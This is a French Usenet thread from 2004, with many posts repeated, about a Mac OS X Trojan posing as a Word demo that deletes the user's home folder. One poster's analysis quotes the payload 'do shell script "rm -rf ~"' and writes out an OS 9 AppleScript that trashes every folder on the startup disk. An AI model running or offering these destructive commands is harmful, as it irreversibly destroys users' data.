Bonjour. Je viens d'effacer de mon disque ce cheval de Troie détecté par
Virus Barrier X. J'ai été averti automatiquement par Otego.
Est-ce que de nombreuses personnes ont eu cette peste, apparue le 10
Mai, et qui est très dangereuse sur OS X, car elle efface
irrémédiablement tout le dossier Users?
http://www.intego.com/news/pr42.html
--
J. Pelmont
http://perso.wanadoo.fr/pelmont/index.html
for mail remove "aky"
Le 15/05/04 20:23, dans <150520042023215610%, « Dimitri Mouffet » a écrit :
Est-ce que le mdp seul suffit? Ne faut-il pas que ce mdp soit associé à l'identifiant du compte administrateur pour que l'application puisse en faire quelque chose?
Par exemple:
Un utilisateur standard sans droits d'administration lance une application qui demande le mdp administrateur. Si l'utilisateur entre *uniquement* le mdp est-ce que l'application pourra effectuer des opérations avec les droits d'administration? En d'autres termes, peut-elle deviner à quel compte est associé ce mdp?
Le mot de passe sert à permettre à l'application de changer d'utilisateur, typiquement il s'agit de devenir "root". Le nom du compte d'origine ne sert à rien, l'important est l'autorisation donnée à l'application de passer en root. Une fois là, tout est possible, et les noms des comptes et les mots de passe divers de la machine ne servent plus à rien. L'application peut même les changer si elle le veut.
-- Éric Lévénez -- <http://www.levenez.com/> Unix is not only an OS, it's a way of life.
Le 15/05/04 20:23, dans <150520042023215610%dmouffetPAR@ICImac.com>,
« Dimitri Mouffet » <dmouffetPAR@ICImac.com> a écrit :
Est-ce que le mdp seul suffit? Ne faut-il pas que ce mdp soit associé à
l'identifiant du compte administrateur pour que l'application puisse en
faire quelque chose?
Par exemple:
Un utilisateur standard sans droits d'administration lance une
application qui demande le mdp administrateur. Si l'utilisateur entre
*uniquement* le mdp est-ce que l'application pourra effectuer des
opérations avec les droits d'administration? En d'autres termes,
peut-elle deviner à quel compte est associé ce mdp?
Le mot de passe sert à permettre à l'application de changer d'utilisateur,
typiquement il s'agit de devenir "root". Le nom du compte d'origine ne sert
à rien, l'important est l'autorisation donnée à l'application de passer en
root. Une fois là, tout est possible, et les noms des comptes et les mots de
passe divers de la machine ne servent plus à rien. L'application peut même
les changer si elle le veut.
--
Éric Lévénez -- <http://www.levenez.com/>
Unix is not only an OS, it's a way of life.
Le 15/05/04 20:23, dans <150520042023215610%, « Dimitri Mouffet » a écrit :
Est-ce que le mdp seul suffit? Ne faut-il pas que ce mdp soit associé à l'identifiant du compte administrateur pour que l'application puisse en faire quelque chose?
Par exemple:
Un utilisateur standard sans droits d'administration lance une application qui demande le mdp administrateur. Si l'utilisateur entre *uniquement* le mdp est-ce que l'application pourra effectuer des opérations avec les droits d'administration? En d'autres termes, peut-elle deviner à quel compte est associé ce mdp?
Le mot de passe sert à permettre à l'application de changer d'utilisateur, typiquement il s'agit de devenir "root". Le nom du compte d'origine ne sert à rien, l'important est l'autorisation donnée à l'application de passer en root. Une fois là, tout est possible, et les noms des comptes et les mots de passe divers de la machine ne servent plus à rien. L'application peut même les changer si elle le veut.
-- Éric Lévénez -- <http://www.levenez.com/> Unix is not only an OS, it's a way of life.
benoit.sansspam
JRP wrote:
Puisque tu étudies ce cheval de Troie, tiens nous au courant, c'est toujours intéressant pour la communauté ! Mais si tu trouves qu'il y a une faille de sécurité dans OS X, ici tu vas te faire mal voir ! :-)
L'étude a vite été faite : un coup de drag & drop de l'appli sur l'éditeur de d'AppleScript et on y trouve une ligne « do shell script "rm -rf ~" ».
Le script a été enregistré en tant qu'application et fait 60 Ko là-dessus on lui a collé l'icone qui va bien et qui pèse dans les 50 Ko et on arrive au 108 Ko du produit fini.
Maintenant la même chose était à peu près réalisable sous OS9 mais avec plus d'une ligne de script et en plus on pouvait faire plus de dégâts, genre :
tell application "Finder" select every folder of startup disk move selection to trash empty trash end tell
Quelques lignes de plus pour ne pas sélectioner le dossier système qui aurait généré des alertes lors du vidage de la corbeille et voilà !
-- Benoît Leraillez
La douleur des autres est tout à fait supportable, hors les cris.
JRP <jaky.pelmont@wanadoo.fr> wrote:
Puisque tu étudies ce cheval de Troie, tiens nous au courant, c'est
toujours intéressant pour la communauté ! Mais si tu trouves qu'il y a
une faille de sécurité dans OS X, ici tu vas te faire mal voir ! :-)
L'étude a vite été faite : un coup de drag & drop de l'appli sur
l'éditeur de d'AppleScript et on y trouve une ligne
« do shell script "rm -rf ~" ».
Le script a été enregistré en tant qu'application et fait 60 Ko
là-dessus on lui a collé l'icone qui va bien et qui pèse dans les 50 Ko
et on arrive au 108 Ko du produit fini.
Maintenant la même chose était à peu près réalisable sous OS9 mais
avec plus d'une ligne de script et en plus on pouvait faire plus de
dégâts, genre :
tell application "Finder"
select every folder of startup disk
move selection to trash
empty trash
end tell
Quelques lignes de plus pour ne pas sélectioner le dossier système qui
aurait généré des alertes lors du vidage de la corbeille et voilà !
--
Benoît Leraillez
La douleur des autres est tout à fait supportable, hors les cris.
Puisque tu étudies ce cheval de Troie, tiens nous au courant, c'est toujours intéressant pour la communauté ! Mais si tu trouves qu'il y a une faille de sécurité dans OS X, ici tu vas te faire mal voir ! :-)
L'étude a vite été faite : un coup de drag & drop de l'appli sur l'éditeur de d'AppleScript et on y trouve une ligne « do shell script "rm -rf ~" ».
Le script a été enregistré en tant qu'application et fait 60 Ko là-dessus on lui a collé l'icone qui va bien et qui pèse dans les 50 Ko et on arrive au 108 Ko du produit fini.
Maintenant la même chose était à peu près réalisable sous OS9 mais avec plus d'une ligne de script et en plus on pouvait faire plus de dégâts, genre :
tell application "Finder" select every folder of startup disk move selection to trash empty trash end tell
Quelques lignes de plus pour ne pas sélectioner le dossier système qui aurait généré des alertes lors du vidage de la corbeille et voilà !
-- Benoît Leraillez
La douleur des autres est tout à fait supportable, hors les cris.
crackintosh
In article <1gdvf2i.7hmtmgnvnnboN%, Michelle wrote:
ben alors ceux qui n'ont pas Word sont les grands gagnants dans l'affaire parce que jamais ils n'iront ouvrir une application aussi suspecte.
Tu ne sembles pas avoir bien compris l'histoire :
1/ il s'agit d'une "fausse" demo de word
toute personne ne l'ayant pas peut donc être intéressée à vouloir l'essayer
2/ ici il s'agit de word, mais demain ce pourrait être n'importe quelle appli ou autre
-- crackintosh
In article <1gdvf2i.7hmtmgnvnnboN%michelle@wanadoo.fr>, Michelle
<michelle@wanadoo.fr> wrote:
ben alors ceux qui n'ont pas Word sont les grands gagnants dans
l'affaire parce que jamais ils n'iront ouvrir une application aussi
suspecte.
Tu ne sembles pas avoir bien compris l'histoire :
1/ il s'agit d'une "fausse" demo de word
toute personne ne l'ayant pas peut donc être intéressée à vouloir
l'essayer
2/ ici il s'agit de word, mais demain ce pourrait être n'importe quelle
appli ou autre
In article <1gdvf2i.7hmtmgnvnnboN%, Michelle wrote:
ben alors ceux qui n'ont pas Word sont les grands gagnants dans l'affaire parce que jamais ils n'iront ouvrir une application aussi suspecte.
Tu ne sembles pas avoir bien compris l'histoire :
1/ il s'agit d'une "fausse" demo de word
toute personne ne l'ayant pas peut donc être intéressée à vouloir l'essayer
2/ ici il s'agit de word, mais demain ce pourrait être n'importe quelle appli ou autre
-- crackintosh
Laurent FIGNON
Michelle wrote:
ah ok, j'avais pas compris ça... ceci dit j'aimerais bien savoir combien pèse le sus-dit fichier parce qu'une démo de Word ça doit quand même être censée faire plusieurs Mo.
Pour les habitués du monde Wintel, il est fréquent de voir certains fabriquants de logiciels pratiquer de la sorte : 1- Offrir un programme d'installation aux utilisateurs 2- Voir ce programme d'installation se connecter à Internet et au site de l'éditeur du logiciel afin de télécharger les derniers fichiers mis à jour de l'application à installer.
=> Microsoft pratiquait de la sorte avec Internet Explorer => Apple partique tjrs de la sorte avec QuickTime pour Windows en proposant une installation (mais il est possible de charger l'intégralité de l'archive QuickTime quand même...) qui reprend le modèle décrit ci-dessus...
:-)
-- Laurent FIGNON (... L'imposteur c'est l'autre...)
Michelle wrote:
ah ok, j'avais pas compris ça... ceci dit j'aimerais bien savoir
combien pèse le sus-dit fichier parce qu'une démo de Word ça doit
quand même être censée faire plusieurs Mo.
Pour les habitués du monde Wintel, il est fréquent de voir certains
fabriquants de logiciels pratiquer de la sorte :
1- Offrir un programme d'installation aux utilisateurs
2- Voir ce programme d'installation se connecter à Internet et au site de
l'éditeur du logiciel afin de télécharger les derniers fichiers mis à jour
de l'application à installer.
=> Microsoft pratiquait de la sorte avec Internet Explorer
=> Apple partique tjrs de la sorte avec QuickTime pour Windows en proposant
une installation (mais il est possible de charger l'intégralité de l'archive
QuickTime quand même...) qui reprend le modèle décrit ci-dessus...
:-)
--
Laurent FIGNON
(... L'imposteur c'est l'autre...)
ah ok, j'avais pas compris ça... ceci dit j'aimerais bien savoir combien pèse le sus-dit fichier parce qu'une démo de Word ça doit quand même être censée faire plusieurs Mo.
Pour les habitués du monde Wintel, il est fréquent de voir certains fabriquants de logiciels pratiquer de la sorte : 1- Offrir un programme d'installation aux utilisateurs 2- Voir ce programme d'installation se connecter à Internet et au site de l'éditeur du logiciel afin de télécharger les derniers fichiers mis à jour de l'application à installer.
=> Microsoft pratiquait de la sorte avec Internet Explorer => Apple partique tjrs de la sorte avec QuickTime pour Windows en proposant une installation (mais il est possible de charger l'intégralité de l'archive QuickTime quand même...) qui reprend le modèle décrit ci-dessus...
:-)
-- Laurent FIGNON (... L'imposteur c'est l'autre...)
Laurent FIGNON
Laurent FIGNON wrote:
1- Offrir un programme d'installation aux utilisateurs...
Et la taille de ce programme est très très petite...
:-)
Laurent
Laurent FIGNON wrote:
1- Offrir un programme d'installation aux utilisateurs...
Et la taille de ce programme est très très petite...
Ca, c'est plutôt rassurant, notamment pour les gens comme moi qui boycottent systématiquement tout ce qui s'apparente à du Microsoft.
Le problème, c'est qu'on peut faire la même chose avec un appli cation "libre", et là, les gens comme toi se précipiteront dessus.
-- D.Manoeuvre
lists
crackintosh wrote:
2/ ici il s'agit de word, mais demain ce pourrait être n'importe quelle appli ou autre
hier aussi.
-- R: Parce que ça renverse bêtement l'ordre naturel de lecture! Q: Mais pourquoi citer en fin d'article est-il si effroyable? R: Citer en fin d'article Q: Quelle est la chose la plus désagréable sur les groupes de news?
crackintosh <news@junk.com.invalid> wrote:
2/ ici il s'agit de word, mais demain ce pourrait être n'importe quelle
appli ou autre
hier aussi.
--
R: Parce que ça renverse bêtement l'ordre naturel de lecture!
Q: Mais pourquoi citer en fin d'article est-il si effroyable?
R: Citer en fin d'article
Q: Quelle est la chose la plus désagréable sur les groupes de news?
2/ ici il s'agit de word, mais demain ce pourrait être n'importe quelle appli ou autre
hier aussi.
-- R: Parce que ça renverse bêtement l'ordre naturel de lecture! Q: Mais pourquoi citer en fin d'article est-il si effroyable? R: Citer en fin d'article Q: Quelle est la chose la plus désagréable sur les groupes de news?
dominiquelang
Damien Manoeuvre wrote:
Le problème, c'est qu'on peut faire la même chose avec un appli cation "libre", et là, les gens comme toi se précipiteront dessus.
Woh-là! Depuis ma dernière douche fcomoxienne, je me précipite plus... Maintenant, les autres, prions qu'ils soient prévenus. -- Hop! (tm) et amitiés! Dominique Lang Gériatrie: <http://perso.wanadoo.fr/dominique.lang/accueil.html> Club Macami: <http://www.macami.net>
Damien Manoeuvre <dmanoeuvre@free.fr> wrote:
Le problème, c'est qu'on peut faire la même chose avec un appli cation
"libre", et là, les gens comme toi se précipiteront dessus.
Woh-là! Depuis ma dernière douche fcomoxienne, je me précipite plus...
Maintenant, les autres, prions qu'ils soient prévenus.
--
Hop! (tm) et amitiés!
Dominique Lang
Gériatrie: <http://perso.wanadoo.fr/dominique.lang/accueil.html>
Club Macami: <http://www.macami.net>
Le problème, c'est qu'on peut faire la même chose avec un appli cation "libre", et là, les gens comme toi se précipiteront dessus.
Woh-là! Depuis ma dernière douche fcomoxienne, je me précipite plus... Maintenant, les autres, prions qu'ils soient prévenus. -- Hop! (tm) et amitiés! Dominique Lang Gériatrie: <http://perso.wanadoo.fr/dominique.lang/accueil.html> Club Macami: <http://www.macami.net>
dominiquelang
Laurent FIGNON wrote:
1- Offrir un programme d'installation aux utilisateurs 2- Voir ce programme d'installation se connecter à Internet et au site de l'éditeur du logiciel afin de télécharger les derniers fichiers mis à jour de l'application à installer.
Je crois bien que c'est ce que fait aussi Adobe avec Acrobat Reader 6... -- Hop! (tm) et amitiés! Dominique Lang Gériatrie: <http://perso.wanadoo.fr/dominique.lang/accueil.html> Club Macami: <http://www.macami.net>
Laurent FIGNON <fignonlaurent@msn.com> wrote:
1- Offrir un programme d'installation aux utilisateurs
2- Voir ce programme d'installation se connecter à Internet et au site de
l'éditeur du logiciel afin de télécharger les derniers fichiers mis à jour
de l'application à installer.
Je crois bien que c'est ce que fait aussi Adobe avec Acrobat Reader 6...
--
Hop! (tm) et amitiés!
Dominique Lang
Gériatrie: <http://perso.wanadoo.fr/dominique.lang/accueil.html>
Club Macami: <http://www.macami.net>
1- Offrir un programme d'installation aux utilisateurs 2- Voir ce programme d'installation se connecter à Internet et au site de l'éditeur du logiciel afin de télécharger les derniers fichiers mis à jour de l'application à installer.
Je crois bien que c'est ce que fait aussi Adobe avec Acrobat Reader 6... -- Hop! (tm) et amitiés! Dominique Lang Gériatrie: <http://perso.wanadoo.fr/dominique.lang/accueil.html> Club Macami: <http://www.macami.net>
jaky.pelmont
Benoit wrote:
L'étude a vite été faite : un coup de drag & drop de l'appli sur l'éditeur de d'AppleScript et on y trouve une ligne « do shell script "rm -rf ~" ».
Le script a été enregistré en tant qu'application et fait 60 Ko là-dessus on lui a collé l'icone qui va bien et qui pèse dans les 50 Ko et on arrive au 108 Ko du produit fini.
Maintenant la même chose était à peu près réalisable sous OS9 ........
Voilà qui est clair, net et précis. Merci. Ce que mon antivirus m'a enlevé, c'était effectivement un script. J'ai pas trop cherché à le titiller ! Maintenant il y en a même qui veulent absolument que j'aie téléchargé des trucs comme des démos, Word etc. Non ! Pour moi c'est terminé.
Sauf que cela suggère que OS X peut très bien intéresser les emmerdeurs qui font de tels programmes, il n'y a pas d'immunité si on en croit les commentaires divers dans ce groupe, parfois par des personnes qui sont visiblement des programmeurs. Les mêmes qui nous recommandent d'être vigilants, ils ont sûrement raison.
Amicalement -- J. Pelmont http://perso.wanadoo.fr/pelmont/index.html for mail remove "aky"
L'étude a vite été faite : un coup de drag & drop de l'appli sur
l'éditeur de d'AppleScript et on y trouve une ligne
« do shell script "rm -rf ~" ».
Le script a été enregistré en tant qu'application et fait 60 Ko
là-dessus on lui a collé l'icone qui va bien et qui pèse dans les 50 Ko
et on arrive au 108 Ko du produit fini.
Maintenant la même chose était à peu près réalisable sous OS9 ........
Voilà qui est clair, net et précis. Merci.
Ce que mon antivirus m'a enlevé, c'était effectivement un script. J'ai
pas trop cherché à le titiller ! Maintenant il y en a même qui veulent
absolument que j'aie téléchargé des trucs comme des démos, Word etc. Non
! Pour moi c'est terminé.
Sauf que cela suggère que OS X peut très bien intéresser les emmerdeurs
qui font de tels programmes, il n'y a pas d'immunité si on en croit les
commentaires divers dans ce groupe, parfois par des personnes qui sont
visiblement des programmeurs. Les mêmes qui nous recommandent d'être
vigilants, ils ont sûrement raison.
Amicalement
--
J. Pelmont
http://perso.wanadoo.fr/pelmont/index.html
for mail remove "aky"
L'étude a vite été faite : un coup de drag & drop de l'appli sur l'éditeur de d'AppleScript et on y trouve une ligne « do shell script "rm -rf ~" ».
Le script a été enregistré en tant qu'application et fait 60 Ko là-dessus on lui a collé l'icone qui va bien et qui pèse dans les 50 Ko et on arrive au 108 Ko du produit fini.
Maintenant la même chose était à peu près réalisable sous OS9 ........
Voilà qui est clair, net et précis. Merci. Ce que mon antivirus m'a enlevé, c'était effectivement un script. J'ai pas trop cherché à le titiller ! Maintenant il y en a même qui veulent absolument que j'aie téléchargé des trucs comme des démos, Word etc. Non ! Pour moi c'est terminé.
Sauf que cela suggère que OS X peut très bien intéresser les emmerdeurs qui font de tels programmes, il n'y a pas d'immunité si on en croit les commentaires divers dans ce groupe, parfois par des personnes qui sont visiblement des programmeurs. Les mêmes qui nous recommandent d'être vigilants, ils ont sûrement raison.
Amicalement -- J. Pelmont http://perso.wanadoo.fr/pelmont/index.html for mail remove "aky"
